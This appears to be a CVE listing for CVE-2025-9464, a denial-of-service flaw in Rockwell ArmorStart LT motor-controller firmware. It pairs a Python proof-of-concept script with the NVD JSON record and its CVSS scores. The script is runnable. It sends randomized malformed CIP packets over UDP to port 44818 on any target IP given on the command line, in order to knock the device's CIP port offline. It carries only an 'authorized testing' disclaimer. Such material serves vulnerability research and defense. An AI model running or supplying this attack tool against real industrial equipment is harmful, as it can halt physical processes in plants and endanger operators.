CVE-2025-9464

#!/usr/bin/env python3 """ CVE-2025-9464 PoC - ArmorStart LT CIP Fuzzing DoS Note: This PoC is for educational and authorized testing purposes only. """ import socket import struct import random def create_cip_rr_data_request(service, class_id, instance_id, data=b''): """Create CIP Request data for fuzzing""" # CIP Header cip_data = bytearray() # Service code (Read/Write attribute) cip_data.append(service) # 0x0C for GetAttributeAll, 0x10 for SetAttributeAll # Path (class, instance) cip_data.extend([0x20, class_id]) # Class ID cip_data.extend([0x24, instance_id]) # Instance ID # Add fuzzing data cip_data.extend(data) return bytes(cip_data) def send_cip_fuzz_packet(target_ip, target_port=44818, iterations=100): """Send fuzzed CIP packets to trigger DoS condition""" print(f"[*] Starting CIP fuzzing against {target_ip}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) for i in range(iterations): # Generate fuzzed CIP data with various malformed inputs service = random.choice([0x01, 0x04, 0x0C, 0x10, 0x4C, 0x4D]) class_id = random.randint(0x01, 0xFF) instance_id = random.randint(0x01, 0xFF) # Generate random fuzzing payload fuzz_data = bytes([random.randint(0, 255) for _ in range(random.randint(10, 100))]) cip_payload = create_cip_rr_data_request(service, class_id, instance_id, fuzz_data) try: sock.sendto(cip_payload, (target_ip, target_port)) print(f"[*] Sent fuzz packet {i+1}/{iterations}") except Exception as e: print(f"[!] Error sending packet: {e}") sock.close() print("[*] Fuzzing completed") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 cve-2025-9464-poc.py <target_ip>") sys.exit(1) target = sys.argv[1] send_cip_fuzz_packet(target)

{"cve": {"id": "CVE-2025-9464", "sourceIdentifier": "[email protected]", "published": "2026-01-20T14:16:15.173", "lastModified": "2026-02-02T18:08:48.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. This vulnerability is triggered during fuzzing of multiple CIP classes, which causes the CIP port to become unresponsive."}, {"lang": "es", "value": "Existe un problema de seguridad en ArmorStart® LT que puede resultar en una condición de denegación de servicio. Esta vulnerabilidad se activa durante el fuzzing de múltiples clases CIP, lo que provoca que el puerto CIP deje de responder."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.002", "matchCriteriaId": "564CE3DE-2D80-4511-B970-C644C7217F20"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AB2017-CB37-4A93-90FD-7FE82640FB77"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}